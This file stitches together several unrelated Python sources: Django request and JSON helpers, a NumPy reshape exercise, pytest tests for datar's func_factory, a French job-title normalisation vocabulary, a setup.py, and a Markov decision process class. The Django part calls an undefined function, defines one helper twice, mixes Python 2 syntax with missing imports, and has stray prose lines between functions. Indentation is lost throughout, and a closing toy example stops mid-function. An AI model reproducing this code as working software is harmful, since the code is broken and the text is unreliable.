from datetime import datetime, time, date
import simplejson as json
def get_top_object_or_None(Object, *args, **kwargs):
if hasattr(Object, 'objects'):
obj = Object.objects.filter(*args, **kwargs)
else:
obj = Object.filter(*args, **kwargs)
if obj:
return obj[0]
return None
def get_object_or_None(Object, *args, **kwargs):
try:
return _get_object_or_404(Object, *args, **kwargs)
except (Http404, MultipleObjectsReturned):
return None
def get_object_or_404(Object, *args, **kwargs):
"""Retruns object or raise Http404 if it does not exist"""
try:
if hasattr(Object, 'objects'):
return Object.objects.get(*args, **kwargs)
elif hasattr(Object, 'get'):
return Object.get(*args, **kwargs)
else:
raise Http404("Giving object has no manager instance")
    except (Object.DoesNotExist, Object.MultipleObjectsReturned):
raise Http404("Object does not exist or multiple object returned")
def get_content_type(Object):
"""
    works with ModelBase-based classes, their instances,
    and with the format string 'app_label.model_name'; also supports
    sphinx models and instances
    source adapted from warmist's helpers
    retrieves the content type or raises the usual Django exceptions
Examples:
get_content_type(User)
get_content_type(onsite_user)
get_content_type('auth.user')
"""
if callable(Object): # class
model = Object._meta.module_name
app_label = Object._meta.app_label
#model = Object.__name__.lower()
#app_label = (x for x in reversed(
# Object.__module__.split('.')) if x not in 'models').next()
elif hasattr(Object, 'pk'): # class instance
if hasattr(Object, '_sphinx') or hasattr(Object, '_current_object'):
model = Object._current_object._meta.module_name
app_label = Object._current_object._meta.app_label
#app_label = (x for x in reversed(
# Object._current_object.__module__.split('.')) \
#if x not in 'models').next()
#model = Object._current_object.__class__.__name__.lower()
else:
app_label = Object._meta.app_label
model = Object._meta.module_name
#app_label = (x for x in reversed(Object.__module__.split('.')) \
#if x not in 'models').next()
#model = Object.__class__.__name__.lower()
elif isinstance(Object, basestring):
app_label, model = Object.split('.')
ct = ContentType.objects.get(app_label=app_label, model=model)
return ct
def get_content_type_or_None(Object):
    try:
        return get_content_type(Object)
    except Exception:
        return None
def get_content_type_or_404(Object):
    try:
        return get_content_type(Object)
    except Exception:
        raise Http404
def get_form(app_label, form_name):
""" retrieve form within app_label and form_name given set"""
pass
def ajax_response(dt):
_errors = []
if 'errors' in dt:
        for key in dt['errors'].keys():
            _errors.append({'key': key, 'msg': dt['errors'][key]})
dt.update({'errors': _errors})
dt.update({'status': 200})
return dt
def generate_safe_value(value, regex):
if isinstance(regex, str):
regex = re.compile(regex, re.U | re.I)
match = regex.match(value or '')
if match:
return match.group()
return None
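A usage sketch of the match-and-truncate behaviour above (the identifier pattern is an assumption for illustration):

```python
import re

IDENT = re.compile(r'[a-z0-9_]+', re.I)

def safe_value(value, regex):
    # match from the start; anything after the first illegal char is dropped
    m = regex.match(value or '')
    return m.group() if m else None

a = safe_value('user_1!drop table', IDENT)  # truncated at '!'
b = safe_value('!bad', IDENT)               # no match at position 0
c = safe_value(None, IDENT)                 # None is coerced to ''
```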
def make_http_response(**kw):
response = HttpResponse(status=kw.get('status', 200))
response['Content-Type'] = kw.get('content_type', 'text/plain')
if 'content' in kw:
response.write(kw['content'])
return response
def make_response(type='json', **kw):
response = HttpResponse(status=kw.get('status', 200))
if type in ('json', 'javascript', 'js'):
response['Content-Type'] = 'text/javascript'
else:
response['Content-Type'] = 'text/plain'
return response
def ajax_form_errors(errors):
""" returns form errors as python list """
errs = [{'key': k, 'msg': unicode(errors[k])} for k in errors.keys()]
#equivalent to
#for k in form.errors.keys():
# errors.append({'key': k, 'msg': unicode(form.errors[k])})
return errs
def paginate(Obj, page, **kwargs):
from django.core.paginator import InvalidPage, EmptyPage
from apps.core.diggpaginator import DiggPaginator as Paginator
pages = kwargs['pages'] if 'pages' in kwargs else 20
if 'pages' in kwargs:
del kwargs['pages']
paginator = Paginator(Obj, pages, **kwargs)
try:
objects = paginator.page(page)
except (InvalidPage, EmptyPage):
objects = paginator.page(1)
objects.count = pages # objects.end_index() - objects.start_index() +1
return objects
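The paginator fallback above collapses invalid pages to page 1; a framework-free sketch of that clamping behaviour, with list slicing standing in for Django's Paginator:

```python
def paginate_list(items, page, per_page=20):
    # fall back to page 1 on out-of-range requests, like the InvalidPage handler
    total_pages = max(1, -(-len(items) // per_page))  # ceiling division
    if page < 1 or page > total_pages:
        page = 1
    start = (page - 1) * per_page
    return items[start:start + per_page], total_pages

chunk, total = paginate_list(list(range(45)), 3)
```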
def model_json_encoder(obj, **kwargs):
from django.db.models.base import ModelState
from django.db.models import Model
from django.db.models.query import QuerySet
from decimal import Decimal
from django.db.models.fields.files import ImageFieldFile
is_human = kwargs.get('parse_humanday', False)
if isinstance(obj, QuerySet):
return list(obj)
elif isinstance(obj, Model):
dt = obj.__dict__
        # Obsolete: better to use functools.partial here
fields = ['_content_type_cache', '_author_cache', '_state']
for key in fields:
if key in dt:
del dt[key]
        # normalize caches
disable_cache = kwargs['disable_cache'] \
if 'disable_cache' in kwargs else False
# disable cache if disable_cache given
        for key in list(dt.keys()):
            if '_cache' in key and key.startswith('_'):
                if not disable_cache:
                    # expose the cached value under its public name
                    dt[key[1:]] = dt[key]
                # drop the private cache entry in either case
                del dt[key]
#delete restriction fields
if kwargs.get('fields_restrict'):
for f in kwargs.get('fields_restrict'):
if f in dt:
del dt[f]
        # make the week field more human-readable
if is_human and 'week' in dt:
dt['week'] = unicode(humanday(dt['week']))
return dt
elif isinstance(obj, ModelState):
return 'state'
elif isinstance(obj, datetime):
return [
obj.year, obj.month, obj.day,
obj.hour, obj.minute, obj.second,
obj.isocalendar()[1]
]
elif isinstance(obj, date):
return [obj.year, obj.month, obj.day]
elif isinstance(obj, time):
return obj.strftime("%H:%M")
elif isinstance(obj, ImageFieldFile):
return obj.url if hasattr(obj, 'url') else ''
#elif isinstance(obj, Decimal):
# return float(obj)
return obj
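`model_json_encoder` is meant to be passed as the `default=` hook of `json.dumps`. A minimal Django-free sketch of that pattern, covering only the datetime branch (the `demo_encoder` name is ours, for illustration):

```python
import json
from datetime import datetime

def demo_encoder(obj):
    # Same convention as model_json_encoder above: datetimes become
    # [year, month, day, hour, minute, second, iso_week].
    if isinstance(obj, datetime):
        return [obj.year, obj.month, obj.day,
                obj.hour, obj.minute, obj.second,
                obj.isocalendar()[1]]
    raise TypeError(obj)

print(json.dumps({'when': datetime(2020, 1, 6, 12, 30, 0)}, default=demo_encoder))
# -> {"when": [2020, 1, 6, 12, 30, 0, 2]}
```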
def get_model_instance_json(Obj, id):
instance = get_object_or_None(Obj, id=id)
response = make_http_response(content_type='text/javascript')
if not instance:
response.write(json.dumps({
'success': False,
'error': unicode(_("Not found")),
}, default=model_json_encoder))
return response
response.write(json.dumps({
'success': True,
'instance': instance,
}, default=model_json_encoder))
return response
def create_path(path):
try:
os.stat(path)
except OSError, e:
if e.errno == 2:
os.makedirs(path)
else:
pass
return path
def get_safe_fields(lst, Obj):
""" excludes fields in given lst from Object """
return [
field.attname for field in Obj._meta.fields
if field.attname not in lst
]
#decorators
def render_to(template, content_type='text/html'):
def decorator(func):
def wrapper(request, *args, **kwargs):
dt = func(request, *args, **kwargs)
if 'redirect' in dt:
return redirect(dt['redirect'])
if content_type.lower() == 'text/html':
return render_to_response(
template,
dt,
context_instance=RequestContext(request))
elif content_type.lower() in ['text/json', 'text/javascript']:
response = HttpResponse()
response['Content-Type'] = content_type
tmpl = get_template(template)
response.write(tmpl.render(Context(dt)))
return response
else:
return render_to_response(
template,
dt, context_instance=RequestContext(request))
return wrapper
return decorator
def ajax_response(func):  # NOTE: shadows the ajax_response helper defined above
def wrapper(request, *args, **kwargs):
dt = func(request, *args, **kwargs)
response = make_http_response(content_type='text/javascript')
response.write(json.dumps(dt, default=model_json_encoder))
return response
return wrapper
# File: Python/Numpy/Shape and Reshape/shape_and_reshape.py
# Repo: brianchiang-tw/HackerRank (MIT)
import numpy as np
from typing import List
def reshape_to_square_matrix(seq: List) -> np.ndarray:
    square_matrix = np.array(seq)
    # reshape to square matrix
square_matrix.shape = (3,3)
return square_matrix
if __name__ == '__main__':
int_sequence = list( map( int, input().split() ) )
# Method_#1
    #sq_matrix = reshape_to_square_matrix( int_sequence )
#print( sq_matrix )
# Method_#2
sq_matrix = np.array( int_sequence )
sq_matrix = np.reshape( sq_matrix, (3,3) )
print( sq_matrix )
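As a pure-Python illustration of what the `np.reshape(..., (3, 3))` call above does (no NumPy required; `reshape_3x3` is our name for the sketch):

```python
def reshape_3x3(seq):
    # Split a flat 9-element sequence into three rows of three,
    # mirroring np.reshape(seq, (3, 3)).
    assert len(seq) == 9, "need exactly 9 elements"
    return [list(seq[i:i + 3]) for i in range(0, 9, 3)]

print(reshape_3x3([1, 2, 3, 4, 5, 6, 7, 8, 9]))
# -> [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
```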
# File: tests/core/test_factory.py
# Repo: pdwaggoner/datar (MIT)
import inspect
import pytest
import numpy as np
from datar.core.backends.pandas import Categorical, DataFrame, Series
from datar.core.backends.pandas.testing import assert_frame_equal
from datar.core.backends.pandas.core.groupby import SeriesGroupBy
from datar.core.factory import func_factory
from datar.core.tibble import (
SeriesCategorical,
SeriesRowwise,
TibbleGrouped,
TibbleRowwise,
)
from datar.tibble import tibble
from ..conftest import assert_iterable_equal
def test_transform_default():
@func_factory("transform", "x")
def double(x):
return x * 2
# scalar
out = double(3)
assert out[0] == 6
out = double(np.array([1, 2], dtype=int))
assert_iterable_equal(out, [2, 4])
@func_factory("transform", "x")
def double(x):
return x * 2
out = double([1, 2])
assert_iterable_equal(out, [2, 4])
# default on series
x = Series([2, 3], index=["a", "b"])
out = double(x)
assert isinstance(out, Series)
assert_iterable_equal(out.index, ["a", "b"])
assert_iterable_equal(out, [4, 6])
# default on dataframe
x = DataFrame({"a": [3, 4]})
out = double(x)
assert isinstance(out, DataFrame)
assert_iterable_equal(out.a, [6, 8])
# default on seriesgroupby
x = Series([1, 2, 1, 2]).groupby([1, 1, 2, 2])
out = double(x)
assert isinstance(out, SeriesGroupBy)
assert_iterable_equal(out.obj, [2, 4, 2, 4])
assert out.grouper.ngroups == 2
# on tibble grouped
x = tibble(x=[1, 2, 1, 2], g=[1, 1, 2, 2]).group_by("g")
out = double(x)
# grouping variables not included
assert_iterable_equal(out.x.obj, [2, 4, 2, 4])
x = tibble(x=[1, 2, 1, 2], g=[1, 1, 2, 2]).rowwise("g")
out = double(x)
assert isinstance(out, TibbleRowwise)
assert_frame_equal(out, out._datar["grouped"].obj)
assert_iterable_equal(out.x.obj, [2, 4, 2, 4])
assert_iterable_equal(out.group_vars, ["g"])
def test_transform_register():
@func_factory(kind="transform", data_args="x")
def double(x):
return x * 2
@double.register(DataFrame)
def _(x):
return x * 3
x = Series([2, 3])
out = double(x)
assert_iterable_equal(out, [4, 6])
double.register(Series, lambda x: x * 4)
out = double(x)
assert_iterable_equal(out, [8, 12])
x = tibble(a=[1, 3])
out = double(x)
assert_iterable_equal(out.a, [3, 9])
out = double([1, 4])
assert_iterable_equal(out, [4, 16])
    # register an available string func for transform
double.register(SeriesGroupBy, "sum")
x = Series([1, -2]).groupby([1, 2])
out = double(x)
assert_iterable_equal(out.obj, [1, -2])
# seriesrowwise
double.register(SeriesRowwise, lambda x: x + 1)
x.is_rowwise = True
out = double(x)
assert_iterable_equal(out.obj, [2, -1])
assert out.is_rowwise
def test_transform_hooks():
@func_factory(kind="transform", data_args="x")
def times(x, t):
return x * t
with pytest.raises(ValueError):
times.register(Series, meta=False, pre=1, func=None)
times.register(
Series,
func=None,
pre=lambda x, t: (x, (-t,), {}),
post=lambda out, x, t: out + t,
)
x = Series([1, 2])
out = times(x, -1)
assert_iterable_equal(out, [2, 3])
@times.register(Series, meta=False)
def _(x, t):
return x + t
out = times(x, 10)
assert_iterable_equal(out, [11, 12])
@times.register(SeriesGroupBy, meta=True)
def _(x, t):
return x + 10
x = Series([1, 2, 1, 2]).groupby([1, 1, 2, 2])
out = times(x, 1)
assert_iterable_equal(out.obj, [11, 12, 11, 12])
times.register(
SeriesGroupBy,
func=None,
pre=lambda x, t: (x, (t + 1,), {}),
post=lambda out, x, *args, **kwargs: out,
)
out = times(x, 1)
assert_iterable_equal(out, [2, 4, 2, 4])
times.register(
Series,
func=None,
pre=lambda *args, **kwargs: None,
post=lambda out, x, t: out + t,
)
x = Series([1, 2])
out = times(x, 3)
assert_iterable_equal(out, [4, 5])
@times.register(DataFrame, meta=True)
def _(x, t):
return x ** t
x = tibble(a=[1, 2], b=[2, 3])
out = times(x, 3)
assert_iterable_equal(out.a, [1, 8])
assert_iterable_equal(out.b, [8, 27])
# TibbleGrouped
times.register(
TibbleGrouped,
func=None,
pre=lambda x, t: (x, (t - 1,), {}),
post=lambda out, x, t: out.reindex([1, 0]),
)
x = x.group_by("a")
out = times(x, 3)
assert_iterable_equal(out.b, [6, 4])
@times.register(
TibbleGrouped,
meta=False,
)
def _(x, t):
out = x.transform(lambda d, t: d * t, 0, t - 1)
out.iloc[0, 1] = 10
return out
# x = tibble(a=[1, 2], b=[2, 3]) # grouped by a
out = times(x, 3)
assert isinstance(out, TibbleGrouped)
assert_iterable_equal(out.group_vars, ["a"])
assert_iterable_equal(out.b.obj, [10, 6])
def test_agg():
men = func_factory(
"agg",
"a",
name="men",
func=np.mean,
signature=inspect.signature(lambda a: None),
)
x = [1, 2, 3]
out = men(x)
assert out == 2.0
x = Series([1, 2, 3])
out = men(x)
assert out == 2.0
# SeriesGroupBy
men.register(SeriesGroupBy, func="mean")
x = Series([1, 2, 4]).groupby([1, 2, 2])
out = men(x)
assert_iterable_equal(out.index, [1, 2])
assert_iterable_equal(out, [1.0, 3.0])
# SeriesRowwise
df = tibble(x=[1, 2, 4]).rowwise()
out = men(df.x)
assert_iterable_equal(out, df.x.obj)
men.register(SeriesRowwise, func="sum")
out = men(df.x)
assert_iterable_equal(out.index, [0, 1, 2])
assert_iterable_equal(out, [1.0, 2.0, 4.0])
# TibbleRowwise
x = tibble(a=[1, 2, 3], b=[4, 5, 6]).rowwise()
out = men(x)
assert_iterable_equal(out, [2.5, 3.5, 4.5])
# TibbleGrouped
x = tibble(a=[1, 2, 3], b=[4, 5, 5]).group_by("b")
out = men(x)
assert_iterable_equal(out.a, [1.0, 2.5])
def test_varargs_data_args():
@func_factory("agg", {"x", "args[0]"})
def mulsum(x, *args):
return (x + args[0]) * args[1]
out = mulsum([1, 2], 2, 3)
assert_iterable_equal(out, [9, 12])
@func_factory("agg", {"x", "args"})
def mulsum(x, *args):
return x + args[0] + args[1]
out = mulsum([1, 2], [1, 2], [2, 3])
assert_iterable_equal(out, [4, 7])
def test_dataargs_not_exist():
fun = func_factory("agg", "y")(lambda x: None)
with pytest.raises(ValueError):
fun(1)
def test_args_frame():
@func_factory("agg", {"x", "y"})
def frame(x, y, __args_frame=None):
return __args_frame
out = frame(1, 2)
assert_iterable_equal(sorted(out.columns), ["x", "y"])
def test_args_raw():
@func_factory("agg", {"x"})
def raw(x, __args_raw=None):
return x, __args_raw["x"]
outx, rawx = raw(1)
assert isinstance(outx, Series)
assert rawx == 1
def test_apply():
@func_factory("apply", "x")
def rn(x):
return tibble(x=[1, 2, 3])
x = tibble(a=[1, 2], b=[2, 3]).rowwise()
out = rn(x)
assert out.shape == (2,)
assert out.iloc[0].shape == (3, 1)
def test_no_func_registered():
fun = func_factory("agg", "x", func=lambda x: None)
with pytest.raises(ValueError):
fun.register(SeriesGroupBy, func=None, meta=False)
def test_run_error():
@func_factory("agg", "x")
def error(x):
raise RuntimeError
with pytest.raises(ValueError, match="registered function"):
error(1)
def test_series_cat():
@func_factory("agg", "x")
def sum1(x):
return x.sum()
@sum1.register(SeriesCategorical)
def _(x):
return x[0]
out = sum1([1, 2])
assert out == 3
out = sum1(Categorical([1, 2]))
assert out == 1
def test_str_fun():
sum2 = func_factory(
"agg",
"x",
name="sum2",
qualname="sum2",
func="sum",
signature=inspect.signature(lambda x: None),
)
assert sum2([1, 2, 3]) == 6
# -*- coding: utf-8 -*-
# File: job_title_processing/ressources_txt/FR/cleaner/job.py
# Repo: OnlineJobVacanciesESSnetBigData/JobTitleProcessing_FR (MIT)
jobwords = [
'nan',
'temps plein', 'temps complet', 'mi temps', 'temps partiel', # Part / Full time
'cherche', # look for
'urgent','rapidement', 'futur',
'job', 'offre', # Job offer
'trice', 'ère', 'eur', 'euse', 're', 'se', 'ème', 'trices', # Female endings
'ères', 'eurs', 'euses', 'res', 'fe', 'fes',# Female endings
've', 'ne', 'iere', 'rice', 'te', 'er', 'ice',
'ves', 'nes', 'ieres', 'rices', "tes", 'ices', # Female endings
'hf', 'fh', # Male/Female, Female/Male
'semaine', 'semaines', 'sem',
'h', 'heure', 'heures', 'hebdo', 'hebdomadaire', # Time (week, hour)
'année', 'mois', 'an', # Year
'jour', 'jours', # Day
'été', 'automne', 'hiver', 'printemps', # summer, winter ...
'lundi', 'mardi', 'mercredi', 'jeudi', 'vendredi', 'samedi', 'dimanche', # Week day
'janvier', 'février', 'mars', 'avril', 'mai', 'juin', # Month
'juillet', 'aout', 'septembre', 'octobre', 'novembre', 'décembre',
"deux", "trois", "quatre", "cinq", "six", "sept", # Number
"huit", "neuf", "dix", "onze", # Number
"euros", "euro", "dollars", "dollar", # Money
"super", # Pour éviter "super poids lourd"
# To clean
'caces', 'cap', 'bts', 'dea', 'diplôme', 'bac',
"taf", "ref", "poste", "pourvoir", "sein", "profil",
"possible",
'indépendant',
'saisonnier', 'alternance', 'alternant', 'apprenti',
'apprentissage', 'stagiaire', 'étudiant', 'fonctionnaire',
'intermittent', 'élève', 'freelance', "professionnalisation",
'partiel', 'cdd', 'cdi', 'contrat', 'pro',
"fpe", # Fonction publique d'état
'débutant', 'expérimenté', 'junior', 'senior',
'confirmé', 'catégorie',
'trilingue', 'bilingue',
'bi','international', 'france', 'national', 'régional',
'européen', 'emploi', 'non',
'exclusif', 'uniquement',
'permis', 'ssiap', 'bnssa',
]
job_replace_infirst = {
'3 d' : 'troisd',
'3d':'troisd',
'2 d': 'deuxd',
'2d':'deuxd',
'b to b': 'btob'
}
job_lemmas_expr = {
'cours particulier' : 'professeur',
'call center' : 'centre appels',
'vl pl vu' : 'poids lourd',
'front end' : 'informatique',
'back end' : 'informatique',
'homme femme' : '',
'femme homme' : ''
}
job_normalize_map = [
("indu", "industriel"),
("pl","poids lourd"),
("spl","poids lourd"),
("sav","service après vente"),
("unix","informatique"),
("windows","informatique"),
("php","informatique"),
("java","informatique"),
("python","informatique"),
("jee","informatique"),
("sap","informatique"),
("abap","informatique"),
("ntic","informatique"),
# ("c","informatique"),
("rh","ressources humaines"),
("vrd","voirie réseaux divers"),
("super poids lourd","poids lourd"),
("adv","administration des ventes"),
("cvv","chauffage climatisation"),
("agt","agent"),
("ash","agent des services hospitaliers"),
("ibode","infirmier de bloc opératoire"),
("aes","accompagnant éducatif et social"),
("ads","agent de sécurité"),
("amp","aide médico psychologique"),
("asvp","agent de surveillance des voies publiques"),
("cesf","conseiller en économie sociale et familiale"),
("babysitter","baby sitter"),
("babysitting","baby sitter"),
("sitting","sitter"),
("nounou", "nourrice"),
("coaching","coach"),
("webdesigner","web designer"),
("webmarketer","web marketer"),
("helpdesk","help desk"),
("prof","professeur"),
("maths", "mathématiques"),
("géo", "géographie"),
("philo", "philosophie"),
("epr","employe polyvalent de restauration"),
("NTIC","Informatique"),
("SIG","Systèmes d Information Géographique "),
("EPSCP","établissement public à caractère scientifique, culturel et professionnel "),
("NRBC","Nucléaire, Radiologique, Bactériologique, Chimique "),
("SAV","Service après vente"),
("ACIM ","Agent des Cabinets en Imagerie Médicale "),
("ASC","Agent des Services Commerciaux"),
("AEC","Agent d Escale Commerciale"),
("ASEM","Agent spécialisé des écoles maternelles "),
("TIC","Informatique"),
("HSE","Hygiène Sécurité Environnement "),
("ATER","Attaché temporaire d enseignement et de recherche "),
("AVS","Auxiliaire de Vie Sociale "),
("AIS","Auxiliaire d Intégration Scolaire"),
("ASV","Auxiliaire Spécialisé Vétérinaire "),
("AVQ","Auxiliaire Vétérinaire Qualifié"),
("IARD","Incendie, Accidents, Risques Divers "),
("NBC","Nucléaire, Bactériologique et Chimique"),
("PGC","Produits de Grande Consommation "),
("PNT","Personnel Navigant Technique "),
("PAO","Publication Assistée par Ordinateur"),
("TTA","toute arme"),
("VRD","Voiries et Réseaux Divers"),
("CMS","Composants Montés en Surface "),
("VSL","Véhicule Sanitaire Léger"),
("CIP","Conseiller d Insertion et de Probation "),
("CND","Contrôle Non Destructif "),
("MOA","Maîtrise d Ouvrage"),
("OPC","Ordonnancement, Pilotage et Coordination de chantier"),
("SPS","Sécurité, Protection de la Santé "),
("DAF","Directeur administratif et financier"),
("CHU","Centre Hospitalier Universitaire "),
("GSB","Grande Surface de Bricolage "),
("GSS","Grande Surface Spécialisée "),
("DOSI","Directeur de l Organisation et des Systèmes d Information "),
("ESAT","entreprise ou de Service d Aide par le Travail "),
("DRH","Directeur des Ressources Humaines "),
("DSI","Directeur des services informatiques "),
("DSPIP","Directeur des services pénitentiaires d insertion et de probation "),
("EPA","Etablissement Public à caractère Administratif "),
("EPST","Etablissement Public à caractère Scientifique et Technologique "),
("EPCC","Etablissement Public de Coopération Culturelle "),
("EPIC","Etablissement Public et Commercial "),
("IFSI","Institut de formation en soins infirmiers"),
("MAS","Machines à Sous "),
("SCOP","Société Coopérative Ouvrière de Production"),
(" EVS","Employée du Service Après Vente "),
("EVAT","Engagée Volontaire de l Armée de Terre "),
("EV","Engagé Volontaire "),
("GIR","Groupement d Individuels Regroupés "),
("CN","Commande Numérique "),
("SICAV","Société d Investissement à Capital Variable "),
("OPCMV","Organisme de Placement Collectif en Valeurs Mobilières "),
("OPCVM","Organisme de Placement Collectif en Valeurs Mobilières "),
("IADE","Infirmier Anesthésiste Diplômé d Etat "),
("IBODE","Infirmier de bloc opératoire Diplômé d Etat "),
("CTC","contrôle technique de construction "),
("IGREF","Ingénieur du génie rural des eaux et forêts "),
("IAA","Inspecteur d académie adjoint"),
("DSDEN","directeur des services départementaux de l Education nationale "),
("IEN","Inspecteur de l Education Nationale "),
("IET","Inspecteur de l enseignement technique "),
("ISPV","Inspecteur de Santé Publique Vétérinaire "),
("IDEN","Inspecteur départemental de l Education nationale "),
("IIO","Inspecteur d information et d orientation "),
("IGEN","Inspecteur général de l Education nationale "),
("IPR","Inspecteur pédagogique régional"),
("IPET","Inspecteur principal de l enseignement technique "),
("PNC","Personnel Navigant Commercial "),
("MPR","Magasin de Pièces de Rechange "),
("CME","Cellule, Moteur, Electricité "),
("BTP","Bâtiments et Travaux Publics "),
("EIR","Electricité, Instrument de bord, Radio "),
("MAR","Médecin Anesthésiste Réanimateur "),
("PMI","Protection Maternelle et Infantile "),
("MISP","Médecin Inspecteur de Santé Publique "),
("MIRTMO","Médecin Inspecteur Régional du Travail et de la Main d oeuvre "),
("DIM","Documentation et de l Information Médicale"),
("OPL","Officier pilote de ligne "),
("CN","commande numérique "),
("PPM","Patron Plaisance Moteur "),
("PPV","Patron Plaisance Moteur "),
("PhISP","Pharmacien Inspecteur de Santé Publique "),
("PDG","Président Directeur Général "),
("FLE","Français Langue Etrangère "),
("PLP","Professeur de lycée professionnel "),
("EPS","éducation physique et sportive "),
("PEGL","Professeur d enseignement général de lycée "),
("PEGC","Professeur d enseignement général des collèges "),
("INJS","instituts nationaux de jeunes sourds "),
("INJA","instituts nationaux de jeunes aveugles "),
("TZR","titulaire en zone de remplacement "),
("CFAO","Conception de Fabrication Assistée par Ordinateur "),
("SPIP","service pénitentiaire d insertion et de probation "),
("PME","Petite ou Moyenne Entreprise "),
("RRH","Responsable des Ressources Humaines "),
("QSE","Qualité Sécurité Environnement "),
("SASU","Secrétaire d administration scolaire et universitaire "),
("MAG","Metal Active Gas "),
("MIG","Metal Inert Gas "),
("TIG","Tungsten Inert Gas "),
("GED","Gestion électronique de documents"),
("CVM","Circulations Verticales Mécanisées "),
("TISF","Technicien Intervention Sociale et Familiale"),
("MAO","Musique Assistée par Ordinateur"),
# ("Paie","paye"),
# ("paies","paye"),
("ml","mission locale"),
("AS","aide soignant"),
("IDE","infirmier de soins généraux"),
("ERD","études recherche et développement")
]
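A hypothetical sketch of how these tables might be applied to a raw title (the real cleaner in this package may work differently); only tiny samples of the tables are redefined so the snippet is self-contained:

```python
# Tiny samples of the tables above, redefined for a standalone demo.
normalize_map_sample = [("pl", "poids lourd"), ("rh", "ressources humaines")]
jobwords_sample = {"h", "f", "hf", "cdi"}

def clean_title(title):
    # Lowercase, expand abbreviations, then drop stop words.
    mapping = {k.lower(): v.lower() for k, v in normalize_map_sample}
    words = [mapping.get(w, w) for w in title.lower().split()]
    return " ".join(w for w in words if w not in jobwords_sample)

print(clean_title("Chauffeur PL CDI"))  # -> chauffeur poids lourd
```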
# File: setup.py
# Repo: cardosan/tempo_test (BSD-3-Clause)
from setuptools import setup
import io
setup(
name='bw2temporalis',
version="0.9.2",
packages=[
"bw2temporalis",
"bw2temporalis.tests",
"bw2temporalis.examples",
"bw2temporalis.cofire"
],
author="Chris Mutel",
author_email="cmutel@gmail.com",
license=io.open('LICENSE.txt', encoding='utf-8').read(),
url="https://bitbucket.org/cmutel/brightway2-temporalis",
install_requires=[
"arrow",
"eight",
"brightway2",
"bw2analyzer",
"bw2calc>=0.11",
"bw2data>=0.12",
"bw2speedups>=2.0",
"numexpr",
"numpy",
"scipy",
"stats_arrays",
],
    description='Provide dynamic LCA calculations for the Brightway2 life cycle assessment framework',
long_description=io.open('README.rst', encoding='utf-8').read(),
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Visualization',
],
)
#!/usr/bin/env python3
# File: MDP/MDP.py
# Repo: ADP-Benchmarks/ADP-Benchmark (MIT)
# -*- coding: utf-8 -*-
"""
GitHub Homepage
----------------
https://github.com/ADP-Benchmarks
Contact information
-------------------
ADP.Benchmarks@gmail.com.
License
-------
The MIT License
"""
from MDP.spaces.space import Space
from MDP.transition import Transition
from MDP.objective import Objective
import copy
class MDP:
"""
Description
-----------
    This class provides a generic implementation for continuous- and
    discrete-state MDPs. Finite- and infinite-time horizon MDPs as
    well as average- and discounted-cost MDPs can be handled.
"""
def __init__(self, initState = None,
sSpace = None,
aSpace = None,
nSpace = None,
transition = None,
objective = None,
isFiniteHorizon = False,
isAveCost = False,
terminalStates=None,):
"""
Inputs
------
initState [list]: initial state vector, that is the list of
components of the starting state.
sSpace [Space]: MDP state space.
aSpace [Space]: MDP action space.
nSpace [Space]: MDP exogenous noise space.
transition [Transition]: MDP stochastic kernel (e.g., MDP
transition matrix for discrete MDPs).
objective [Objective]: the MDP cost/reward function.
isFiniteHorizon [int]: if int, MDP is finite-time horizon of length
isFiniteHorizon, else if False,
it is infinite-time horizon.
isAveCost [bool]: if True, MDP is average-cost, else it is
discounted-cost.
        terminalStates [list]: list of absorbing states for episodic MDPs
Raises/Returns
--------------
Explanations
------------
The constructor of MDP class.
"""
# assert(isinstance(sSpace,Space))
# assert(isinstance(aSpace,Space))
# assert(isinstance(nSpace,Space))
assert(isinstance(transition,Transition))
assert(isinstance(objective,Objective))
assert sSpace.isStateFeasble(initState), 'Intial state should belong to\
the state space'
#TODO initState -> initDist
self.initState = initState
self.terminalStates = terminalStates
self.sSpace = sSpace
self.aSpace = aSpace
self.nSpace = nSpace
self.sDim = self.sSpace.dim
self.aDim = self.aSpace.dim
self.nDim = self.nSpace.dim
self.transition = transition
self.objective = objective
self.isFiniteHorizon = isFiniteHorizon
self.isAveCost = isAveCost
self.reset()
def step(self, action, force_noise=None):
'''
Takes one step in the MDP.
--------------------------
Inputs
------
action [list]: current action vector, that is the list of
components of the current action
force_noise [list]: optional, an exogenous noise vector used to
evaluate next state and reward. If not provided,
the noise vector will be sampled randomly
Returns
-------
nextState [list]: next state at t+1
reward [float]: Scalar reward/cost
done [boolean]: True if an absorbing state is reached,
for the case of absorbing MDPs
info [dict]: Provides info about the noise outcome and current period
in the finite horizon case
'''
#TODO This function should support generating a list of next states
if not force_noise:
noise = self.nSpace.sample()[0]
else:
noise = force_noise
nextState = self.transition.getNextStateWithExoSamples(self.currState,
action,
noise)
reward = self.objective.getObjectiveWithExoSamples(self.currState,
action,
noise)
self.currState = nextState
if self.isFiniteHorizon:
# Increment the period
self.t += 1
if self.t >= self.isFiniteHorizon:
self.reset()
return nextState, reward, {'t': self.t, 'noise': noise}
# Infinite horizon MDP
elif self.terminalStates:
done = nextState in self.terminalStates
return nextState, reward, done, {'noise': noise}
else:
return nextState, reward, {'noise': noise}
def reset(self,):
'''
Resets the state back to the initial state
------------------------------------------
Returns
-------
initState [list]: initial state vector, that is the list of
components of the starting state.
        t [int]: starting period t for finite horizon MDPs
'''
self.currState = copy.deepcopy(self.initState)
if self.isFiniteHorizon:
self.t = 0
return (self.currState,self.t)
else:
return self.currState
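A toy, self-contained illustration of the `step()`/`reset()` contract above, with hard-coded dynamics standing in for the `Transition`/`Objective` objects (everything in `ToyMDP` is hypothetical):

```python
class ToyMDP:
    # Walk on {0..4}; state 4 is absorbing, unit cost per step.
    def __init__(self):
        self.terminal = 4
        self.reset()

    def reset(self):
        self.currState = 0
        return self.currState

    def step(self, action, force_noise=None):
        # Mirrors the MDP.step signature: a forced noise value makes
        # the transition deterministic for the demo below.
        noise = force_noise if force_noise is not None else 1
        self.currState = min(max(self.currState + action * noise, 0),
                             self.terminal)
        reward = -1
        done = self.currState == self.terminal
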